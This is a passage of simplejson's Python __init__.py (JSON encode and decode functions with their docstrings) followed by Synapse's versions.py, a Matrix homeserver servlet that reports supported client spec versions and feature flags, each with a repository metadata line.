versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If specified, *separators* should be an
``(item_separator, key_separator)`` tuple. The default is ``(', ', ': ')``
if *indent* is ``None`` and ``(',', ': ')`` otherwise. To get the most
compact JSON representation, you should specify ``(',', ':')`` to eliminate
whitespace.
*encoding* is the character encoding for str instances, default is UTF-8.
*default(obj)* is a function that should return a serializable version
of obj or raise ``TypeError``. The default simply raises ``TypeError``.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *iterable_as_array* is true (default: ``False``),
any object not in the above table that implements ``__iter__()``
will be encoded as a JSON array.
If *bigint_as_string* is true (default: ``False``), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise. Note that this is still a
lossy operation that will not round-trip correctly and should be used
sparingly.
If *int_as_string_bitcount* is a positive number (n), then ints of size
greater than or equal to 2**n or lower than or equal to -2**n will be
encoded as strings.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precedence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
If *for_json* is true (default: ``False``), objects with a ``for_json()``
method will use the return value of that method for encoding as JSON
instead of the object.
If *ignore_nan* is true (default: ``False``), then out of range
:class:`float` values (``nan``, ``inf``, ``-inf``) will be serialized as
``null`` in compliance with the ECMA-262 specification. If true, this will
override *allow_nan*.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg. NOTE: You should use *default* or *for_json* instead
of subclassing whenever possible.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array and not iterable_as_array
and not bigint_as_string and not sort_keys
and not item_sort_key and not for_json
and not ignore_nan and int_as_string_bitcount is None
and not kw
):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
iterable_as_array=iterable_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
for_json=for_json,
ignore_nan=ignore_nan,
int_as_string_bitcount=int_as_string_bitcount,
**kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
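# A short usage sketch for dump() (hedged; the file name is illustrative):
#
#     with open('out.json', 'w') as fp:
#         dump({'a': 1, 'b': [2, 3]}, fp, separators=(',', ':'), sort_keys=True)
#     # out.json then contains: {"a":1,"b":[2,3]}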
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
for_json=False, ignore_nan=False, int_as_string_bitcount=None,
iterable_as_array=False, **kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance with the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If specified, ``separators`` should be an
``(item_separator, key_separator)`` tuple. The default is ``(', ', ': ')``
if *indent* is ``None`` and ``(',', ': ')`` otherwise. To get the most
compact JSON representation, you should specify ``(',', ':')`` to eliminate
whitespace.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *iterable_as_array* is true (default: ``False``),
any object not in the above table that implements ``__iter__()``
will be encoded as a JSON array.
If *bigint_as_string* is true (not the default), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise.
If *int_as_string_bitcount* is a positive number (n), then ints of size
greater than or equal to 2**n or lower than or equal to -2**n will be
encoded as strings.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precedence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
If *for_json* is true (default: ``False``), objects with a ``for_json()``
method will use the return value of that method for encoding as JSON
instead of the object.
If *ignore_nan* is true (default: ``False``), then out of range
:class:`float` values (``nan``, ``inf``, ``-inf``) will be serialized as
``null`` in compliance with the ECMA-262 specification. If true, this will
override *allow_nan*.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg. NOTE: You should use *default* instead of subclassing
whenever possible.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array and not iterable_as_array
and not bigint_as_string and not sort_keys
and not item_sort_key and not for_json
and not ignore_nan and int_as_string_bitcount is None
and not kw
):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
iterable_as_array=iterable_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
for_json=for_json,
ignore_nan=ignore_nan,
int_as_string_bitcount=int_as_string_bitcount,
**kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, namedtuple_as_object=True, tuple_as_array=True,
**kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg. NOTE: You should use *object_hook* or *object_pairs_hook* instead
of subclassing whenever possible.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
use_decimal=use_decimal, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg. NOTE: You should use *object_hook* or *object_pairs_hook* instead
of subclassing whenever possible.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None
and not use_decimal and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
if use_decimal:
if parse_float is not None:
raise TypeError("use_decimal=True implies parse_float=Decimal")
kw['parse_float'] = Decimal
return cls(encoding=encoding, **kw).decode(s)
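# A short usage sketch for loads() with the hooks documented above (hedged):
# use_decimal=True parses JSON floats as decimal.Decimal, and object_pairs_hook
# preserves the key order of each decoded object.
#
#     doc = loads('{"pi": 3.14, "count": 2}',
#                 use_decimal=True, object_pairs_hook=OrderedDict)
#     # doc is an OrderedDict with doc['pi'] == Decimal('3.14') and
#     # doc['count'] == 2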
def _toggle_speedups(enabled):
from . import decoder as dec
from . import encoder as enc
from . import scanner as scan
c_make_encoder = _import_c_make_encoder()
if enabled:
dec.scanstring = dec.c_scanstring or dec.py_scanstring
enc.c_make_encoder = c_make_encoder
enc.encode_basestring_ascii = (enc.c_encode_basestring_ascii or
enc.py_encode_basestring_ascii)
scan.make_scanner = scan.c_make_scanner or scan.py_make_scanner
else:
dec.scanstring = dec.py_scanstring
enc.c_make_encoder = None
enc.encode_basestring_ascii = enc.py_encode_basestring_ascii
scan.make_scanner = scan.py_make_scanner
dec.make_scanner = scan.make_scanner
global _default_decoder
_default_decoder = JSONDecoder(
encoding=None,
object_hook=None,
object_pairs_hook=None,
)
global _default_encoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def simple_first(kv):
"""Helper function to pass to item_sort_key to sort simple
elements to the top, then container elements.
"""
return (isinstance(kv[1], (list, dict, tuple)), kv[0])
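# A short usage sketch for simple_first (hedged): pass it as item_sort_key so
# that scalar members of each object are emitted before container members.
#
#     dumps({'z': 1, 'a': {'nested': True}, 'm': 2}, item_sort_key=simple_first)
#     # -> '{"m": 2, "z": 1, "a": {"nested": true}}'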
| SickGear/SickGear | lib/simplejson/__init__.py | Python | gpl-3.0 | 24,480 |
# Copyright 2016 OpenMarket Ltd
# Copyright 2017 Vector Creations Ltd
# Copyright 2018-2019 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from typing import TYPE_CHECKING, Tuple
from twisted.web.server import Request
from synapse.api.constants import RoomCreationPreset
from synapse.http.server import HttpServer
from synapse.http.servlet import RestServlet
from synapse.types import JsonDict
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class VersionsRestServlet(RestServlet):
PATTERNS = [re.compile("^/_matrix/client/versions$")]
def __init__(self, hs: "HomeServer"):
super().__init__()
self.config = hs.config
# Calculate these once since they shouldn't change after start-up.
self.e2ee_forced_public = (
RoomCreationPreset.PUBLIC_CHAT
in self.config.room.encryption_enabled_by_default_for_room_presets
)
self.e2ee_forced_private = (
RoomCreationPreset.PRIVATE_CHAT
in self.config.room.encryption_enabled_by_default_for_room_presets
)
self.e2ee_forced_trusted_private = (
RoomCreationPreset.TRUSTED_PRIVATE_CHAT
in self.config.room.encryption_enabled_by_default_for_room_presets
)
def on_GET(self, request: Request) -> Tuple[int, JsonDict]:
return (
200,
{
"versions": [
# XXX: at some point we need to decide whether we need to include
# the previous version numbers, given we've defined r0.3.0 to be
# backwards compatible with r0.2.0. But need to check how
# conscientious we've been in compatibility, and decide whether the
# middle number is the major revision when at 0.X.Y (as opposed to
# X.Y.Z). And we need to decide whether it's fair to make clients
# parse the version string to figure out what's going on.
"r0.0.1",
"r0.1.0",
"r0.2.0",
"r0.3.0",
"r0.4.0",
"r0.5.0",
"r0.6.0",
"r0.6.1",
"v1.1",
"v1.2",
],
# as per MSC1497:
"unstable_features": {
# Implements support for label-based filtering as described in
# MSC2326.
"org.matrix.label_based_filtering": True,
# Implements support for cross signing as described in MSC1756
"org.matrix.e2e_cross_signing": True,
# Implements additional endpoints as described in MSC2432
"org.matrix.msc2432": True,
# Implements additional endpoints as described in MSC2666
"uk.half-shot.msc2666": True,
# Whether new rooms will be set to encrypted or not (based on presets).
"io.element.e2ee_forced.public": self.e2ee_forced_public,
"io.element.e2ee_forced.private": self.e2ee_forced_private,
"io.element.e2ee_forced.trusted_private": self.e2ee_forced_trusted_private,
# Supports the busy presence state described in MSC3026.
"org.matrix.msc3026.busy_presence": self.config.experimental.msc3026_enabled,
# Supports receiving hidden read receipts as per MSC2285
"org.matrix.msc2285": self.config.experimental.msc2285_enabled,
# Adds support for importing historical messages as per MSC2716
"org.matrix.msc2716": self.config.experimental.msc2716_enabled,
# Adds support for jump to date endpoints (/timestamp_to_event) as per MSC3030
"org.matrix.msc3030": self.config.experimental.msc3030_enabled,
# Adds support for thread relations, per MSC3440.
"org.matrix.msc3440": self.config.experimental.msc3440_enabled,
},
},
)
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
VersionsRestServlet(hs).register(http_server)
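# A hedged usage sketch: the servlet answers plain GETs on
# /_matrix/client/versions, so against a locally running homeserver (address
# and port below are illustrative) the response could be inspected with:
#
#     $ curl -s http://localhost:8008/_matrix/client/versions | jq '.versions'
#     ["r0.0.1", "r0.1.0", ..., "v1.1", "v1.2"]
#
# The "unstable_features" map in the same response mixes hard-coded
# capabilities with values derived from the homeserver's experimental config.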
| matrix-org/synapse | synapse/rest/client/versions.py | Python | apache-2.0 | 4,936 |